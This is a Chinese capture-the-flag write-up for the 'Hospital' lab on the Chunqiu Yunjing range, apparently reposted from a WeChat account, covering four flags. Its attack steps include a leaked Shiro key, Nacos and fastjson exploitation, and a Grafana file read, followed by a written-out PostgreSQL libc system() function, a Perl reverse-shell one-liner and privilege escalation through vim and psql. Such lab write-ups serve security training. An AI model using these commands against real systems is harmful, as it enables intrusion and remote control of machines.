flag1
给了一个 IP ,先做个全端口探测
shiro 特征,且存在 heapdump 泄露,已经能猜出来是从内存文件中拿到 shiro key 打 shiro
拿到 key 为 GAYysgMQhG7/CzIJlVpR2g==,用 shiro 工具 rce
上线后,因为不是 root 权限,读取不了 flag,SUID 看看
有一个 vim ,那就用 vim 读取拿到第一个 flag
vim /root/flag/flag01.txt
flag2
入口点机器为 172.30.12.5,做代理,对内网继续探测
拿到两个内网地址
http://172.30.12.6:8848 nacos漏洞
http://172.30.12.236:8080 web服务-医院后台管理
先看 nacos ,默认密码 nacos/nacos 登录
配置文件拿到数据库账号密码,只能本地连接,暂时用不上
url: 172.30.12.6:3306
username: root
password: P@ssWord!!!
在对 nacos 做一次漏洞扫描,存在 Nacos Derby SQL,尝试 rce
注入内存马
拿到第二个 flag
flag3
上面信息收集都做完了,没有什么实质性可利用内容,只能看 http://172.30.12.236:8080 的 web 服务
通过报错发现存在 fastjson 组件
注入内存马
root 权限,直接拿flag
flag4
因为该机器不出网,配置入口点机器开隧道上线,存在新的网段 172.30.54.179/24
fscan 探测该网段信息
收集到一个 Grafana 服务,没有设置密码,且存在任意文件读取漏洞
通过 https://github.com/A-D-Team/grafanaExp 项目解密 grafana.db
拿到数据库账号密码 postgres:Postgres@123
postgresql 8.1 版本,不验证 magic block,直接调用 libc.so 即可
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system('perl -e 'use Socket;$i="172.30.54.179";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'');
反弹 shell 到同一网段中的 172.30.54.179 机器上
权限不足,仍然要想办法提权读取 root 目录下的 flag 文件
先把反弹 shell 进入交互 shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
SUID 没有可利用内容
再看看 sudo -l
存在 psql 可以利用
在数据库中修改 root 密码为 123456
ALTER USER root WITH PASSWORD '123456';
读取 flag
原文始发于微信公众号(虹猫少侠):春秋云镜-Hospital
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论